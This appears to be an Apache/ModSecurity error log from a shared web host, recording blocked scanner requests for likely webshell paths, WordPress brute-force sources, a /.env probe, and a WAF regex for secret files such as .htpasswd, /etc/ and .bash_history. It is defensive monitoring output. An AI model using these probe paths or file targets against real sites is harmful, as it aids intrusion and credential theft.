[Tue May 26 13:49:11.682058 2026] [security2:error] [pid 560287:tid 560335] [remote 5.45.96.74:46660] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yndglobal.com"] [uri "/wp-login.php"] [unique_id "ahVXf5mX5s6sDS3wJVcMyAAAxi8"]
[Tue May 26 13:49:11.828836 2026] [security2:error] [pid 560287:tid 560540] [client 20.205.111.246:1953] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/sid3.php"] [unique_id "ahVXf5mX5s6sDS3wJVcM3QAAAPg"]
[Tue May 26 13:49:11.879435 2026] [security2:error] [pid 555743:tid 555937] [client 15.235.169.50:63919] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/IXR/themes.php"] [unique_id "ahVXf8jqAquC0YaxQjCvnAAAAUo"]
[Tue May 26 13:49:12.355537 2026] [security2:error] [pid 560287:tid 560463] [client 15.235.169.50:63993] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/class-matchesmapregex-error-comment.php"] [unique_id "ahVXgJmX5s6sDS3wJVcM8AAAALA"]
[Tue May 26 13:49:12.469368 2026] [security2:error] [pid 560287:tid 560529] [client 84.54.44.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVXf5mX5s6sDS3wJVcMtgAAAO8"], referer: https://www.anujtradingco.com/pages/services-wide/?unapproved=1264128&moderation-hash=53cb562d88264cf6f2dea3bbdd74776a
[Tue May 26 13:49:12.561543 2026] [security2:error] [pid 560287:tid 560527] [client 20.205.111.246:1877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/ss.php"] [unique_id "ahVXgJmX5s6sDS3wJVcM-gAAAO0"]
[Tue May 26 13:49:12.869438 2026] [security2:error] [pid 555743:tid 555892] [client 15.235.169.50:64059] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/a.php"] [unique_id "ahVXgMjqAquC0YaxQjCvwAAAAR0"]
[Tue May 26 13:49:12.961857 2026] [security2:error] [pid 560287:tid 560433] [client 107.189.7.156:51760] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXgJmX5s6sDS3wJVcNAwAAAJQ"]
[Tue May 26 13:49:12.962261 2026] [security2:error] [pid 560287:tid 560435] [client 107.189.7.156:51770] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXgJmX5s6sDS3wJVcNBAAAAJY"]
[Tue May 26 13:49:13.090451 2026] [security2:error] [pid 560287:tid 560461] [client 107.189.7.156:51796] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 156.7.189.107.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/"] [unique_id "ahVXgZmX5s6sDS3wJVcNCQAAAK4"]
[Tue May 26 13:49:13.181535 2026] [security2:error] [pid 555743:tid 555884] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXgMjqAquC0YaxQjCvvAAAARU"]
[Tue May 26 13:49:13.235215 2026] [security2:error] [pid 555743:tid 555969] [client 20.205.111.246:6367] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/sts.php"] [unique_id "ahVXgcjqAquC0YaxQjCv1AAAAWo"]
[Tue May 26 13:49:13.350876 2026] [security2:error] [pid 555743:tid 555873] [client 15.235.169.50:64176] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/shell20211028.php"] [unique_id "ahVXgcjqAquC0YaxQjCv2AAAAQo"]
[Tue May 26 13:49:13.507432 2026] [security2:error] [pid 560287:tid 560442] [client 84.54.44.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVXgZmX5s6sDS3wJVcNFwAAAJw"], referer: https://anujtradingco.com/pages/services-wide/?unapproved=1264128&moderation-hash=53cb562d88264cf6f2dea3bbdd74776a
[Tue May 26 13:49:13.840645 2026] [security2:error] [pid 555743:tid 555920] [client 15.235.169.50:64239] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/web/wp-content/plugins/backup-backup/includes/wp.php"] [unique_id "ahVXgcjqAquC0YaxQjCv6wAAATk"]
[Tue May 26 13:49:13.948177 2026] [security2:error] [pid 560287:tid 560481] [client 20.205.111.246:1071] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/shell.php"] [unique_id "ahVXgZmX5s6sDS3wJVcNLgAAAMA"]
[Tue May 26 13:49:14.320402 2026] [security2:error] [pid 560287:tid 560477] [client 15.235.169.50:64303] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/themes.php"] [unique_id "ahVXgpmX5s6sDS3wJVcNNAAAAL0"]
[Tue May 26 13:49:14.697452 2026] [security2:error] [pid 560287:tid 560466] [client 20.205.111.246:1970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/setup-config.php"] [unique_id "ahVXgpmX5s6sDS3wJVcNQwAAALM"]
[Tue May 26 13:49:14.789381 2026] [security2:error] [pid 555743:tid 555900] [client 15.235.169.50:64358] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/install.php"] [unique_id "ahVXgsjqAquC0YaxQjCwCwAAASU"]
[Tue May 26 13:49:14.838979 2026] [core:error] [pid 555743:tid 555911] [client 198.235.24.162:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:49:14.838994 2026] [core:error] [pid 555743:tid 555911] [client 198.235.24.162:0] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 26 13:49:14.969680 2026] [security2:error] [pid 555743:tid 555925] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXgsjqAquC0YaxQjCwAQAAAT4"]
[Tue May 26 13:49:15.051927 2026] [security2:error] [pid 555743:tid 555947] [client 114.119.149.222:41067] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "newdental.com.co"] [uri "/"] [unique_id "ahVXg8jqAquC0YaxQjCwFgAAAVQ"], referer: http://newdental.com.co/?ucci/9219082014680417l10a/aceadg5172a.hulloa
[Tue May 26 13:49:15.251858 2026] [security2:error] [pid 560287:tid 560423] [client 15.235.169.50:64420] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/moon.php"] [unique_id "ahVXg5mX5s6sDS3wJVcNUwAAAIo"]
[Tue May 26 13:49:15.435721 2026] [security2:error] [pid 560287:tid 560542] [client 20.205.111.246:1628] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/t.php"] [unique_id "ahVXg5mX5s6sDS3wJVcNWgAAAPo"]
[Tue May 26 13:49:15.539923 2026] [security2:error] [pid 560287:tid 560425] [client 74.7.241.172:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "algosoftware.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXgZmX5s6sDS3wJVcNIwAAAIw"]
[Tue May 26 13:49:15.552722 2026] [security2:error] [pid 560287:tid 560422] [client 74.7.241.172:55438] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "algosoftware.bloggertarget.com"] [uri "/robots.txt"] [unique_id "ahVXgZmX5s6sDS3wJVcNIAAAiTg"]
[Tue May 26 13:49:15.739379 2026] [security2:error] [pid 560287:tid 560444] [client 15.235.169.50:64486] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/ss.php"] [unique_id "ahVXg5mX5s6sDS3wJVcNZwAAAJ4"]
[Tue May 26 13:49:15.772283 2026] [security2:error] [pid 560287:tid 560480] [client 208.91.198.85:12116] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXg5mX5s6sDS3wJVcNWwAAvzo"], referer: https://www.bloggertarget.com
[Tue May 26 13:49:15.972140 2026] [security2:error] [pid 555743:tid 555878] [client 208.91.198.85:12148] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahVXg8jqAquC0YaxQjCwNAABDxk"], referer: https://www.bloggertarget.com
[Tue May 26 13:49:16.113573 2026] [security2:error] [pid 560287:tid 560507] [client 20.205.111.246:1622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/up.php"] [unique_id "ahVXhJmX5s6sDS3wJVcNdgAAANk"]
[Tue May 26 13:49:16.208763 2026] [security2:error] [pid 555743:tid 555988] [client 15.235.169.50:64548] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/defaul1.php"] [unique_id "ahVXhMjqAquC0YaxQjCwOwAAAX0"]
[Tue May 26 13:49:16.488305 2026] [security2:error] [pid 555743:tid 555920] [client 106.192.248.115:63138] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXhMjqAquC0YaxQjCwQgAAATk"]
[Tue May 26 13:49:16.488470 2026] [security2:error] [pid 555743:tid 555920] [client 106.192.248.115:63138] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVXhMjqAquC0YaxQjCwQgAAATk"]
[Tue May 26 13:49:16.623931 2026] [security2:error] [pid 555743:tid 555904] [client 176.65.139.234:55606] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "empresas.moneyapp.com.co"] [uri "/.env"] [unique_id "ahVXhMjqAquC0YaxQjCwRQAAASk"]
[Tue May 26 13:49:16.686917 2026] [security2:error] [pid 560287:tid 560542] [client 15.235.169.50:64647] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/rest-api/about.php"] [unique_id "ahVXhJmX5s6sDS3wJVcNigAAAPo"]
[Tue May 26 13:49:16.732025 2026] [security2:error] [pid 560287:tid 560430] [client 14.161.204.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXhJmX5s6sDS3wJVcNegAAAJE"]
[Tue May 26 13:49:16.737413 2026] [security2:error] [pid 555743:tid 555996] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXhMjqAquC0YaxQjCwQQAAAYU"]
[Tue May 26 13:49:16.833374 2026] [security2:error] [pid 560287:tid 560512] [client 20.205.111.246:6234] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/ultra.php"] [unique_id "ahVXhJmX5s6sDS3wJVcNkQAAAN4"]
[Tue May 26 13:49:17.154298 2026] [security2:error] [pid 560287:tid 560522] [client 15.235.169.50:64731] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/edit.php"] [unique_id "ahVXhZmX5s6sDS3wJVcNkgAAAOg"]
[Tue May 26 13:49:17.577574 2026] [security2:error] [pid 560287:tid 560452] [client 20.205.111.246:1658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/vv.php"] [unique_id "ahVXhZmX5s6sDS3wJVcNtAAAAKY"]
[Tue May 26 13:49:17.630016 2026] [security2:error] [pid 555743:tid 555962] [client 15.235.169.50:64793] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/pki-validation/wp-login.php"] [unique_id "ahVXhcjqAquC0YaxQjCwVAAAAWM"]
[Tue May 26 13:49:17.925613 2026] [security2:error] [pid 560287:tid 560538] [client 129.222.147.134:52520] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXhZmX5s6sDS3wJVcNuQAAAPY"]
[Tue May 26 13:49:17.934992 2026] [security2:error] [pid 560287:tid 560538] [client 129.222.147.134:52520] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVXhZmX5s6sDS3wJVcNuQAAAPY"]
[Tue May 26 13:49:18.124691 2026] [security2:error] [pid 560287:tid 560430] [client 15.235.169.50:64863] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/uploads/1.php"] [unique_id "ahVXhpmX5s6sDS3wJVcNwQAAAJE"]
[Tue May 26 13:49:18.248492 2026] [security2:error] [pid 555743:tid 555877] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXhcjqAquC0YaxQjCwVwAAAQ4"]
[Tue May 26 13:49:18.329876 2026] [security2:error] [pid 560287:tid 560500] [client 20.205.111.246:6313] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/V5.php"] [unique_id "ahVXhpmX5s6sDS3wJVcNyQAAANM"]
[Tue May 26 13:49:18.607241 2026] [security2:error] [pid 560287:tid 560426] [client 15.235.169.50:64944] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/SimplePie/plugins.php"] [unique_id "ahVXhpmX5s6sDS3wJVcN0AAAAI0"]
[Tue May 26 13:49:19.062415 2026] [security2:error] [pid 560287:tid 560519] [client 20.205.111.246:1624] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/wp-user.php"] [unique_id "ahVXh5mX5s6sDS3wJVcN1wAAAOU"]
[Tue May 26 13:49:19.071089 2026] [security2:error] [pid 560287:tid 560517] [client 15.235.169.50:65018] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/autoload_classmap.php"] [unique_id "ahVXh5mX5s6sDS3wJVcN2QAAAOM"]
[Tue May 26 13:49:19.473341 2026] [security2:error] [pid 555743:tid 555991] [client 114.119.140.122:39509] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "senoro.com.mx"] [uri "/robots.txt"] [unique_id "ahVXh8jqAquC0YaxQjCwbAAAAYA"]
[Tue May 26 13:49:19.560097 2026] [security2:error] [pid 555743:tid 555968] [client 15.235.169.50:65104] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-includes/new.php"] [unique_id "ahVXh8jqAquC0YaxQjCwbQAAAWk"]
[Tue May 26 13:49:19.780925 2026] [security2:error] [pid 555743:tid 555936] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXh8jqAquC0YaxQjCwaAAAAUk"]
[Tue May 26 13:49:19.818235 2026] [security2:error] [pid 555743:tid 555893] [client 20.205.111.246:1062] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/wp-blog.php"] [unique_id "ahVXh8jqAquC0YaxQjCweQAAAR4"]
[Tue May 26 13:49:20.023924 2026] [security2:error] [pid 555743:tid 555916] [client 15.235.169.50:65239] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/.well-known/acme-challenge/atomlib.php"] [unique_id "ahVXiMjqAquC0YaxQjCwfQAAATU"]
[Tue May 26 13:49:20.497707 2026] [security2:error] [pid 555743:tid 555905] [client 15.235.169.50:65303] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/style.php"] [unique_id "ahVXiMjqAquC0YaxQjCwhwAAASo"]
[Tue May 26 13:49:20.560399 2026] [security2:error] [pid 555743:tid 555929] [client 20.205.111.246:1614] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/wp.php"] [unique_id "ahVXiMjqAquC0YaxQjCwiAAAAUI"]
[Tue May 26 13:49:20.981818 2026] [security2:error] [pid 555743:tid 555899] [client 15.235.169.50:65390] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/wp-content/1.php"] [unique_id "ahVXiMjqAquC0YaxQjCwjwAAASQ"]
[Tue May 26 13:49:21.301825 2026] [security2:error] [pid 555743:tid 555972] [client 20.205.111.246:1548] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/worksec.php"] [unique_id "ahVXicjqAquC0YaxQjCwmgAAAW0"]
[Tue May 26 13:49:21.476349 2026] [security2:error] [pid 555743:tid 555875] [client 15.235.169.50:65458] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "doyecpa.com"] [uri "/lufix.php"] [unique_id "ahVXicjqAquC0YaxQjCwnQAAAQw"]
[Tue May 26 13:49:22.075300 2026] [security2:error] [pid 560287:tid 560451] [client 20.205.111.246:1708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 246.111.205.20.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "doyecpa.taotechservices.com"] [uri "/wp-themes.php"] [unique_id "ahVXipmX5s6sDS3wJVcOHgAAAKU"]
[Tue May 26 13:49:22.154412 2026] [security2:error] [pid 555743:tid 555951] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVXicjqAquC0YaxQjCwpAAAAVg"]
